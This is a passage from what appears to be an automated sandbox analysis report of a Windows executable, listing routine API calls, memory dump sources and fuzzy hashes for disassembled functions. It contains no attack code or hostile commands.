    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 8927fc1b09e7777eb206680d5c0ecf98d29f9cebe0dfbb870fbb659b55ede198
    • Instruction ID: ec5128284ccb52a3c917dffc889741889af5264c1ef48fbeff0f144ebac34082
    • Opcode Fuzzy Hash: 8927fc1b09e7777eb206680d5c0ecf98d29f9cebe0dfbb870fbb659b55ede198
    • Instruction Fuzzy Hash: C7018870800745DAD716EBA8C062BEEFBE4EF62300F10454FE06A63293CBB42B04C762
    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 8ec7b1749386737aa00ef4866b7d0829dc6399af7a8ad3c00de2b56e5676a8cf
    • Instruction ID: 0f58f23c529bafee05e754082a1308dbde8585f86335149422294467cc92d636
    • Opcode Fuzzy Hash: 8ec7b1749386737aa00ef4866b7d0829dc6399af7a8ad3c00de2b56e5676a8cf
    • Instruction Fuzzy Hash: C9E03931700321A6EA712A65AC05BAB3A89DF47BB0B154123EC0596392DF64CC03A6FB
    APIs
      • Part of subcall function 000BBA94: FindFirstFileW.KERNEL32(?,?,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBABD
      • Part of subcall function 000BBA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAEB
      • Part of subcall function 000BBA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAF7
    • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Find$FileFirst$CloseErrorLast
    • String ID:
    • API String ID: 1464966427-0
    • Opcode ID: 38a6bfb92d08522d838d4580d8849c7089d92997e53394a0fa21ef2aa3e77789
    • Instruction ID: 795eae65a517ea739f4485f4d96c21efd93d8b6df1f3714b272a402bec9ac5d6
    • Opcode Fuzzy Hash: 38a6bfb92d08522d838d4580d8849c7089d92997e53394a0fa21ef2aa3e77789
    • Instruction Fuzzy Hash: BDF08232008790ABCA721BB848047CBBFD09F16335F048A49F2FE122D3C3B450959722
    APIs
    • SetThreadExecutionState.KERNEL32(00000001), ref: 000C2156
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExecutionStateThread
    • String ID:
    • API String ID: 2211380416-0
    • Opcode ID: 74f542093a7c33f3e6b9f8e53d8c3e534ccdc8a7fd75b693c24611a088637ce7
    • Instruction ID: 0d18e5cdcd4fadc54dfe708d74025718a38aa2017110eef7c6113e0fbd97d6ff
    • Opcode Fuzzy Hash: 74f542093a7c33f3e6b9f8e53d8c3e534ccdc8a7fd75b693c24611a088637ce7
    • Instruction Fuzzy Hash: 28D05B1571405052EA65377C6855FFD1B465FD2324F0C00BFB70D679D38F680987A2B1
    APIs
    • GdipAlloc.GDIPLUS(00000010), ref: 000CB62C
      • Part of subcall function 000CB3B8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 000CB3D9
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Gdip$AllocBitmapCreateFromStream
    • String ID:
    • API String ID: 1915507550-0
    • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction ID: fac12225f89e2f36a063e6f953606c2194d53789eb241c07d8636da0108b0f2f
    • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
    • Instruction Fuzzy Hash: ABD0A7302002097ADF416B21CC03FBE75959B10340F0080397C02C5181EBB1C9105A51
    APIs
    • DloadProtectSection.DELAYIMP ref: 000CF75F
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DloadProtectSection
    • String ID:
    • API String ID: 2203082970-0
    • Opcode ID: 1c30638d2cdfc0bf076241f4a9cae45be52c86da9dd2da7cba8f7aa05e1ab0f2
    • Instruction ID: 6803e008640798ff8c80b91e8f007b1d0bdef1c8bddd8f8aebeaa7f4570add89
    • Opcode Fuzzy Hash: 1c30638d2cdfc0bf076241f4a9cae45be52c86da9dd2da7cba8f7aa05e1ab0f2
    • Instruction Fuzzy Hash: ADD0C93050820A99DA59ABA4AE86FBC22A3F308768B804629B151D51A9C7744590D613
    APIs
    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,000C2E78), ref: 000CEED2
      • Part of subcall function 000CC748: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 000CC759
      • Part of subcall function 000CC748: KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000CC76A
      • Part of subcall function 000CC748: IsDialogMessageW.USER32(000103E6,?), ref: 000CC77E
      • Part of subcall function 000CC748: TranslateMessage.USER32(?), ref: 000CC78C
      • Part of subcall function 000CC748: DispatchMessageW.USER32(?), ref: 000CC796
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherItemPeekSendTranslateUser
    • String ID:
    • API String ID: 3453300979-0
    • Opcode ID: 2b9ae935fb37188d5ce9b7b89438403a6e5464d4b6a3f1ac23ff2df7d7ea018c
    • Instruction ID: 0b64a9a04221589ae701a9ae6719d1d13edd0f078bcf2a8ab432848229f3d4f1
    • Opcode Fuzzy Hash: 2b9ae935fb37188d5ce9b7b89438403a6e5464d4b6a3f1ac23ff2df7d7ea018c
    • Instruction Fuzzy Hash: 40D09E75145200AEEA012B51DE06F5E7AE2FFC9B08F004658B249740B2C6629E21AF02
    APIs
    • GetFileType.KERNEL32(000000FF,000BAA1E), ref: 000BAB28
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileType
    • String ID:
    • API String ID: 3081899298-0
    • Opcode ID: 1ac0fc47d12e0f205a3e259e275b65e0344aeb7b25cc51d13d66312c245c789b
    • Instruction ID: c9d178e928ca73fbd87bf7e7016efa4a613eb45d9eca2ade597abc34a2dc6492
    • Opcode Fuzzy Hash: 1ac0fc47d12e0f205a3e259e275b65e0344aeb7b25cc51d13d66312c245c789b
    • Instruction Fuzzy Hash: 6AC01234100205854EB00A2498448D57BA3AB533657B493A5C074C90A2C3268C43E502
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 3a2c0690458da1f8ffa74d2a7c857356e3d20908d6ca9da9fe499e1b5af4d207
    • Instruction ID: 36789acab6b06ebe503dc4eb85c2397f1714f6f99a4e119009045446ade61a9f
    • Opcode Fuzzy Hash: 3a2c0690458da1f8ffa74d2a7c857356e3d20908d6ca9da9fe499e1b5af4d207
    • Instruction Fuzzy Hash: 8FB01291268043BD371823113E06F7E021EC3C0B10370403FF001E4082E8400D402033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 221f77944261d838b8204b7a86a4a91c9e7c15eb670422d209d06872ffb50b6c
    • Instruction ID: 568a48f71945c917cde203c45ec0e450be1b9d637b5f09a3a711c3fb3461b528
    • Opcode Fuzzy Hash: 221f77944261d838b8204b7a86a4a91c9e7c15eb670422d209d06872ffb50b6c
    • Instruction Fuzzy Hash: F1B012912A8443BC374863197F02F7E022EC3C0B10370423FF001D8082D8810E412033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e6339c1f8d6931d99a6d74abfe45b84fd903ef7f36898f47b4f824b70b814d69
    • Instruction ID: c86e28e438bb8b87f264aea29b1fef46d00fd8afe2592fc09d7e567b9639de18
    • Opcode Fuzzy Hash: e6339c1f8d6931d99a6d74abfe45b84fd903ef7f36898f47b4f824b70b814d69
    • Instruction Fuzzy Hash: 33B01295268143BC374863157E02F7F021EC3C0B10330803FF401D4082D8800D402033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 2b785315b0232b36308c2f5b2eb36b028fbdb7c999bc75f51297bda89af7fd33
    • Instruction ID: 0cfa953cfc3175683157ee93a01a70df49b102cca0509a48bb11fb93152d2584
    • Opcode Fuzzy Hash: 2b785315b0232b36308c2f5b2eb36b028fbdb7c999bc75f51297bda89af7fd33
    • Instruction Fuzzy Hash: 34B01295278543BC374863197E02F7E022EC3C0B10370413FF001D4082D8400D402433
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 20a043d92d28285e3393a826fe8e8bcc9823c7d45ce07cb1ddb9cb748fe1d297
    • Instruction ID: b604d368a5a544719be011ae05179f92ded4d9e132f9c3984d64220df84d5a3c
    • Opcode Fuzzy Hash: 20a043d92d28285e3393a826fe8e8bcc9823c7d45ce07cb1ddb9cb748fe1d297
    • Instruction Fuzzy Hash: 5DB012D5268243BC3B8863153E02F7F025EC3C0B10330413FF401D4082D8800D806033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6a3d652ab91532d1ac1370e3df7082281116aab302bdf9498f3ef31bbad7f76a
    • Instruction ID: 6769c7ff7aa6c7129440d8df759edd04447f1480d4bbed02ec61df7504df0bc1
    • Opcode Fuzzy Hash: 6a3d652ab91532d1ac1370e3df7082281116aab302bdf9498f3ef31bbad7f76a
    • Instruction Fuzzy Hash: B9B01295268143BC374863153E02F7F022EC3C0B10370403FF001D4082D8800D402133
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 4b7f2e711727e331190c285d7e699394d944a6a52ea6eea65377b66b23aa2829
    • Instruction ID: 1f5ee24cdb47fc52f4ab720c6b245c07ee885ff6517dc2d684fcfb1668fcd51e
    • Opcode Fuzzy Hash: 4b7f2e711727e331190c285d7e699394d944a6a52ea6eea65377b66b23aa2829
    • Instruction Fuzzy Hash: 3FB01291278183BC378863153E02F7E021EC3C0B10330813FF401D4182D8500D842033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0ce0d7961568d2f61cffd7d51bf5bf2a3dbd41c18b9a0763603fefca257d5d26
    • Instruction ID: bc65e34b943573121d580ade046f92e309cbf8e96a015878fd758ff43950c737
    • Opcode Fuzzy Hash: 0ce0d7961568d2f61cffd7d51bf5bf2a3dbd41c18b9a0763603fefca257d5d26
    • Instruction Fuzzy Hash: C5B01291278043BC374863157E02F7E021EC3C1B14330C13FF401D4182D8500D442033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 67edc68b69f08fd505527bc403df3688dfc5e69b90da50fed306429cb1b252de
    • Instruction ID: d3d4886c8ae427ecd8bbe2fede4a00a7f88977f0fe87f09d1e01c6dce6f93e4a
    • Opcode Fuzzy Hash: 67edc68b69f08fd505527bc403df3688dfc5e69b90da50fed306429cb1b252de
    • Instruction Fuzzy Hash: 78B012913B8043BC374863153F02F7E021EC3C0B10330803FF001D8182D8A10E492033
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
